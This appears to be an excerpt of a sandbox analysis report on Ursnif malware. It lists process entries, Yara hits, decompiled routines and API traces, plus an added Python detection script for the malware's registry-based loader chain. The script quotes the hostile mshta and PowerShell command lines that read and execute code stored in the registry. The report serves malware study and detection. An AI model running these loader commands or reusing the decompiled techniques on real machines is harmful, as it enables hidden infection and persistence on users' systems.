                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:18
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:24
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
                                                                                                                                      Imagebase:0x7ff7fbaa0000
                                                                                                                                      File size:2739304 bytes
                                                                                                                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:25
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
                                                                                                                                      Imagebase:0x7ff617aa0000
                                                                                                                                      File size:47280 bytes
                                                                                                                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:27
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
                                                                                                                                      Imagebase:0x7ff7fbaa0000
                                                                                                                                      File size:2739304 bytes
                                                                                                                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:28
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
                                                                                                                                      Imagebase:0x7ff617aa0000
                                                                                                                                      File size:47280 bytes
                                                                                                                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:21:20:32
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:
                                                                                                                                      Imagebase:0x7ff714890000
                                                                                                                                      File size:3933184 bytes
                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:21:20:37
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\control.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                      Imagebase:0x7ff657870000
                                                                                                                                      File size:117760 bytes
                                                                                                                                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                      General

                                                                                                                                      Start time:21:20:44
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:
                                                                                                                                      Imagebase:0x7ff6883e0000
                                                                                                                                      File size:99272 bytes
                                                                                                                                      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
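The mshta, powershell and csc.exe command lines above are the whole registry-resident loader chain: mshta evaluates a script it reads from the Actidsrv value under HKCU\Software\AppDataLow\Software\Microsoft\<GUID>, PowerShell ASCII-decodes and iex-es the basebapi value of the same key, and csc.exe then compiles a helper from a .cmdline response file in the user's Temp folder (the Sigma hits in the signature list). Added example, not part of the Joe Sandbox report: Python detection logic run over constructed process-creation events whose command lines are copied from this section; the event schema (pid, image, parent_image, cmdline), the pid values and the parent images are assumptions, not report data.

```python
"""Detection logic for the registry-resident Ursnif/Gozi loader chain shown in
this report's process list (mshta -> powershell -> csc). Added example, not
Joe Sandbox output. Event schema, pids and parent images are assumptions;
the command lines are the report's.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str
    parent_image: str   # "" where the report does not show the parent
    cmdline: str


# Inline HTA handed to mshta on the command line instead of a file on disk.
HTA_INLINE = re.compile(r"about:<hta:application>", re.I)
# WScript.Shell RegRead() of a registry value holding the next stage.
REGREAD = re.compile(r"regread\('([^']+)'\)", re.I)
# (gp 'HKCU:...').<value> as used by the PowerShell stage.
PS_GP = re.compile(r"\b(?:gp|Get-ItemProperty)\s+'(HKCU:[^']+)'\)\.(\w+)", re.I)
PS_IEX = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
# csc.exe response file under the user's Temp folder (Sigma: suspicious csc source folder).
CSC_TEMP = re.compile(r"@'[^']*\\AppData\\Local\\Temp\\[^']*\.cmdline'", re.I)
# Ursnif keeps its stages under AppDataLow\Software\Microsoft\<GUID>.
APPDATALOW_GUID = re.compile(
    r"\\Software\\AppDataLow\\Software\\Microsoft\\"
    r"[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}$", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def norm_regpath(path: str) -> str:
    # Canonicalise the PowerShell drive form (HKCU:) and the over-escaped
    # JScript form (runs of backslashes) into single-backslash HKCU\... paths.
    path = path.replace("HKCU:", "HKCU\\")
    return re.sub(r"\\+", lambda _m: "\\", path)


def registry_refs(cmdline: str) -> list:
    """(key, value_name) pairs the command line reads its next stage from."""
    refs = []
    for m in REGREAD.finditer(cmdline):
        key, _, value = norm_regpath(m.group(1)).rpartition("\\")
        refs.append((key, value))
    for m in PS_GP.finditer(cmdline):
        refs.append((norm_regpath(m.group(1)), m.group(2)))
    return refs


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def hunt(events) -> list:
    """Return (rule, pid) findings, one per matching rule per event."""
    findings = []
    for e in events:
        name, parent = basename(e.image), basename(e.parent_image)
        refs = registry_refs(e.cmdline)
        if name == "mshta.exe" and HTA_INLINE.search(e.cmdline):
            findings.append(("mshta_inline_hta", e.pid))
        if parent == "mshta.exe" and name in SHELLS:
            findings.append(("mshta_spawns_shell", e.pid))
        if name in ("powershell.exe", "pwsh.exe") and PS_IEX.search(e.cmdline) and refs:
            findings.append(("powershell_iex_from_registry", e.pid))
        if name == "csc.exe" and CSC_TEMP.search(e.cmdline):
            findings.append(("csc_compile_from_temp", e.pid))
        if any(APPDATALOW_GUID.search(key) for key, _ in refs):
            findings.append(("ursnif_appdatalow_guid_key", e.pid))
    return findings


# Constructed sample: pids and parent images are assumed; cmdlines are the report's.
EVENTS = [
    ProcEvent(7001, r"C:\Program Files (x86)\Internet Explorer\iexplore.exe",
              r"C:\Program Files (x86)\Internet Explorer\iexplore.exe",
              r"'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2"),
    ProcEvent(7002, r"C:\Windows\System32\mshta.exe", "",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);"
              r"eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow"
              r"\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));"
              r"if(!window.flag)close()</script>'"),
    ProcEvent(7003, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text."
              r"Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft"
              r"\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"),
    ProcEvent(7004, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths "
              r"@'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'"),
    # Benign control: reads the registry, but no iex and no AppDataLow GUID key.
    ProcEvent(7005, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r"powershell.exe -NoProfile Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'"),
]


if __name__ == "__main__":
    for rule, pid in hunt(EVENTS):
        print(f"{pid}: {rule}")
```

registry_refs() is the piece worth keeping at hand during response: it turns both the JScript RegRead path (with its doubled and tripled backslashes) and the PowerShell HKCU: form into the same key, so the value names to pull from the infected user's hive (Actidsrv and basebapi here) come straight out of the process telemetry without a second look at the host.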

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis

                                                                                                                                        Executed Functions

                                                                                                                                        APIs
                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(0046E268), ref: 0044B886
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • memset.NTDLL ref: 0044B8B7
                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(03BD8D20), ref: 0044B8C8
                                                                                                                                          • Part of subcall function 00442340: RtlInitializeCriticalSection.NTDLL(0046E240), ref: 00442364
                                                                                                                                          • Part of subcall function 00442340: RtlInitializeCriticalSection.NTDLL(0046E220), ref: 0044237A
                                                                                                                                          • Part of subcall function 00442340: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044238B
                                                                                                                                          • Part of subcall function 00442340: GetModuleHandleA.KERNEL32(0046F01D), ref: 004423B8
                                                                                                                                          • Part of subcall function 004617AA: RtlAllocateHeap.NTDLL(00000000,-00000003,77E49EB0), ref: 004617C4
                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060), ref: 0044B8F1
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044B902
                                                                                                                                        • CloseHandle.KERNEL32(00000324), ref: 0044B916
                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,?), ref: 0044B95F
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0044B972
                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,?), ref: 0044B987
                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0044B9B7
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0044B9CC
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044B9D6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044B9E0
                                                                                                                                        • GetShellWindow.USER32 ref: 0044B9FB
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0044BA02
                                                                                                                                        • CreateEventA.KERNEL32(0046E0F8,00000001,00000000,00000000,61636F4C,00000001,?,?), ref: 0044BA91
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 0044BABB
                                                                                                                                        • OpenEventA.KERNEL32(00100000,00000000,03BD89B8), ref: 0044BAE3
                                                                                                                                        • CreateEventA.KERNEL32(0046E0F8,00000001,00000000,03BD89B8), ref: 0044BAF6
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044BAFC
                                                                                                                                        • GetLastError.KERNEL32(0044FC34,0046E04C,0046E050), ref: 0044BB82
                                                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL,0044FC34,0046E04C,0046E050), ref: 0044BB96
                                                                                                                                        • SetEvent.KERNEL32(?,0045D878,00000000,00000000), ref: 0044BC0F
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000052,0045D878), ref: 0044BC24
                                                                                                                                        • wsprintfA.USER32 ref: 0044BC54
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemsetwsprintf
                                                                                                                                        • String ID: 0123456789ABCDEF$ADVAPI32.DLL$`F$`F
                                                                                                                                        • API String ID: 204107308-2135442455
                                                                                                                                        • Opcode ID: 0395e2f28e3d3d4217d74626e3886e97aeea3b8b18e08e230d07e32da626cd5d
                                                                                                                                        • Instruction ID: 809e5b2a8196a2894ef6b79846d897128b370ef5ed000fc730b653e0cad6a945
                                                                                                                                        • Opcode Fuzzy Hash: 0395e2f28e3d3d4217d74626e3886e97aeea3b8b18e08e230d07e32da626cd5d
                                                                                                                                        • Instruction Fuzzy Hash: BEB1B274A04304DFE7209F66DC85A2B7BE8EB44704B11492FF545D2251EBB8E849CBAF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                        			E737513E4(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				struct _FILETIME* _v16;
                                                                                                                                        				short _v60;
                                                                                                                                        				struct _FILETIME* _t14;
                                                                                                                                        				intOrPtr _t15;
                                                                                                                                        				long _t18;
                                                                                                                                        				void* _t19;
                                                                                                                                        				void* _t22;
                                                                                                                                        				intOrPtr _t31;
                                                                                                                                        				long _t32;
                                                                                                                                        				void* _t34;
                                                                                                                                        
                                                                                                                                        				_t31 = __edx;
                                                                                                                                        				_t14 =  &_v16;
                                                                                                                                        				GetSystemTimeAsFileTime(_t14);
                                                                                                                                        				_push(0x192);
                                                                                                                                        				_push(0x54d38000);
                                                                                                                                        				_push(_v12);
                                                                                                                                        				_push(_v16);
                                                                                                                                        				L73752250();
                                                                                                                                        				_push(_t14);
                                                                                                                                        				_v16 = _t14;
                                                                                                                                        				_t15 =  *0x73754150;
                                                                                                                                        				_push(_t15 + 0x7375505e);
                                                                                                                                        				_push(_t15 + 0x73755054);
                                                                                                                                        				_push(0x16);
                                                                                                                                        				_push( &_v60);
                                                                                                                                        				_v12 = _t31;
                                                                                                                                        				L7375224A();
                                                                                                                                        				_t18 = _a4;
                                                                                                                                        				if(_t18 == 0) {
                                                                                                                                        					_t18 = 0x1000;
                                                                                                                                        				}
                                                                                                                                        				_t19 = CreateFileMappingW(0xffffffff, 0x73754140, 4, 0, _t18,  &_v60); // executed
                                                                                                                                        				_t34 = _t19;
                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                        					_t32 = GetLastError();
                                                                                                                                        				} else {
                                                                                                                                        					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                        						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                        						if(_t22 == 0) {
                                                                                                                                        							_t32 = GetLastError();
                                                                                                                                        							if(_t32 != 0) {
                                                                                                                                        								goto L9;
                                                                                                                                        							}
                                                                                                                                        						} else {
                                                                                                                                        							 *_a8 = _t34;
                                                                                                                                        							 *_a12 = _t22;
                                                                                                                                        							_t32 = 0;
                                                                                                                                        						}
                                                                                                                                        					} else {
                                                                                                                                        						_t32 = 2;
                                                                                                                                        						L9:
                                                                                                                                        						CloseHandle(_t34);
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return _t32;
                                                                                                                                        			}
                                                                                                                                         Instruction addresses for the listing above (address of each emitted statement, in listing order; 0x00000000 marks statements without a mapped address):
                                                                                                                                         0x737513e4, 0x737513ed, 0x737513f1, 0x737513f7, 0x737513fc, 0x73751401, 0x73751404, 0x73751407, 0x7375140c, 0x7375140d, 0x73751410, 0x7375141b, 0x73751422, 0x73751426, 0x73751428, 0x73751429, 0x7375142c, 0x73751431, 0x7375143b, 0x7375143d, 0x7375143d, 0x73751451, 0x73751457, 0x7375145b, 0x737514ab, 0x7375145d, 0x73751466, 0x7375147c, 0x73751484, 0x73751496, 0x7375149a, 0x00000000, 0x00000000, 0x73751486, 0x73751489, 0x7375148e, 0x73751490, 0x73751490, 0x73751471, 0x73751473, 0x7375149c, 0x7375149d, 0x7375149d, 0x73751466, 0x737514b3

                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A,?), ref: 737513F1
                                                                                                                                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 73751407
                                                                                                                                        • _snwprintf.NTDLL ref: 7375142C
                                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,73754140,00000004,00000000,?,?), ref: 73751451
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A), ref: 73751468
                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 7375147C
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A), ref: 73751494
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9), ref: 7375149D
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A), ref: 737514A5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
                                                                                                                                         • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1724014008-0
                                                                                                                                        • Opcode ID: 0f0a6a9e98561662153bc0ee6589dbf21e2be8d3932bfe9359678ecbb824f57e
                                                                                                                                        • Instruction ID: f38045e591acce376ae0d1217e65f11278c7b7b525f4fea62009041199ccda01
                                                                                                                                        • Opcode Fuzzy Hash: 0f0a6a9e98561662153bc0ee6589dbf21e2be8d3932bfe9359678ecbb824f57e
                                                                                                                                        • Instruction Fuzzy Hash: 3821A4B7A00208BFDB19AFA5CC84F9E777AEB48252F214025F55AD7190D6355905CB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0046E0FC,00000000), ref: 0045DA94
                                                                                                                                        • StrRChrA.SHLWAPI(03BD85A8,00000000,0000005C,00000000,00000001,00000000,0046E0B4,00000000,?), ref: 0045DAA9
                                                                                                                                        • _strupr.NTDLL ref: 0045DABF
                                                                                                                                        • lstrlen.KERNEL32(03BD85A8), ref: 0045DAC7
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,0046E0B4,00000000,?), ref: 0045DB47
                                                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL(00000000,00461A1D), ref: 0045DB6E
                                                                                                                                        • GetLastError.KERNEL32(?), ref: 0045DB88
                                                                                                                                        • RtlRemoveVectoredExceptionHandler.NTDLL(00644280), ref: 0045DB9E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1098824789-0
                                                                                                                                        • Opcode ID: d0230fe1223668f11c9cfa31fd0df507a040fad6943fd9bf4c332853ec8c5695
                                                                                                                                        • Instruction ID: aa05572dd429cdb4c0776109d87c98cd4f12aef76585c04219c3e049fcde715d
                                                                                                                                        • Opcode Fuzzy Hash: d0230fe1223668f11c9cfa31fd0df507a040fad6943fd9bf4c332853ec8c5695
                                                                                                                                        • Instruction Fuzzy Hash: A631D975D00224AFE720AF7A9C8496F77E5AB04315B15053AE901D3292F6F95C4887AF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 0045A425
                                                                                                                                        • NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 0045A438
                                                                                                                                        • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 0045A454
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 0045A471
                                                                                                                                        • memcpy.NTDLL(00000000,00000000,0000001C), ref: 0045A47E
                                                                                                                                        • NtClose.NTDLL(00000001), ref: 0045A490
                                                                                                                                        • NtClose.NTDLL(00000000), ref: 0045A49A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2575439697-0
                                                                                                                                        • Opcode ID: fccf2e28b5a860de0f1dbd6a36a793c91360e5baa6ad529490a95aee4ed1e0e7
                                                                                                                                        • Instruction ID: 5171fd49ac7ec124286f19b6af922021b59fb05b5570a2d25e35db6ab37ec591
                                                                                                                                        • Opcode Fuzzy Hash: fccf2e28b5a860de0f1dbd6a36a793c91360e5baa6ad529490a95aee4ed1e0e7
                                                                                                                                        • Instruction Fuzzy Hash: 61215572900218BBDB01EF96CC45ADEBFBCFB08780F10416AF900E6120D7B58A54CBA6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,00457ED5,00000800,?,?,00000000,74B05520), ref: 00441F5A
                                                                                                                                          • Part of subcall function 00442710: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000000,00000000,?,?,?,?,00441E28,?,?,?,00000000,74B05520), ref: 00442735
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00442757
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0044276D
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00442783
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00442799
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 004427AF
                                                                                                                                          • Part of subcall function 0046345F: NtMapViewOfSection.NTDLL(00000000,000000FF,00456283,00000000,00000000,00456283,00000000,00000002,00000000,?,?,00000000,00456283,000000FF,00000000), ref: 0046348D
                                                                                                                                          • Part of subcall function 004462CC: memcpy.NTDLL(-00000004,00000004,?,00000000,?,?,?,?,?,?,?,00000000,74B05520), ref: 00446332
                                                                                                                                          • Part of subcall function 004462CC: memcpy.NTDLL(00000000,?,?), ref: 00446391
                                                                                                                                        • memcpy.NTDLL(004414F6,00000000,?,?,00000000,?,?,?,?,?,?,00000000,74B05520), ref: 00441E87
                                                                                                                                        • memcpy.NTDLL(?,00000000,00000018,?,00000000,?,?,?,?,?,?,00000000,74B05520), ref: 00441ED3
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,74B05520), ref: 00441F98
                                                                                                                                        • NtClose.NTDLL(00000000,00000000,74B05520), ref: 00441FBF
                                                                                                                                        • memset.NTDLL ref: 00441FDA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProcmemcpy$SectionView$CloseHandleModuleUnmapmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4028138328-0
                                                                                                                                        • Opcode ID: 40380b94b5cb0a0039b6e71ecbe4d457454f2c1fa789176a41d2bc205f071259
                                                                                                                                        • Instruction ID: d26a5a6bc9e58de4ce24f991a7786cf3b1450464a1b036b151afdb26a45c52b1
                                                                                                                                        • Opcode Fuzzy Hash: 40380b94b5cb0a0039b6e71ecbe4d457454f2c1fa789176a41d2bc205f071259
                                                                                                                                        • Instruction Fuzzy Hash: 91916175E0060AEFDF10DF95C980AAEBBF4FF04304F10456AE805A7361D778AA85DB95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00449798
                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 004497A5
                                                                                                                                        • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00449831
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0044983C
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 00449845
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0044985A
                                                                                                                                          • Part of subcall function 00458584: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,004497D3,?), ref: 0045858C
                                                                                                                                          • Part of subcall function 00458584: GetVersion.KERNEL32 ref: 0045859B
                                                                                                                                          • Part of subcall function 00458584: GetCurrentProcessId.KERNEL32 ref: 004585AA
                                                                                                                                          • Part of subcall function 00458584: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004585C7
                                                                                                                                          • Part of subcall function 00444823: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 00444875
                                                                                                                                          • Part of subcall function 00444823: memcpy.NTDLL(?,?,?,?,?,?), ref: 00444904
                                                                                                                                          • Part of subcall function 00444823: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 0044491F
                                                                                                                                          • Part of subcall function 004649E9: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0044EDBE), ref: 00464A0F
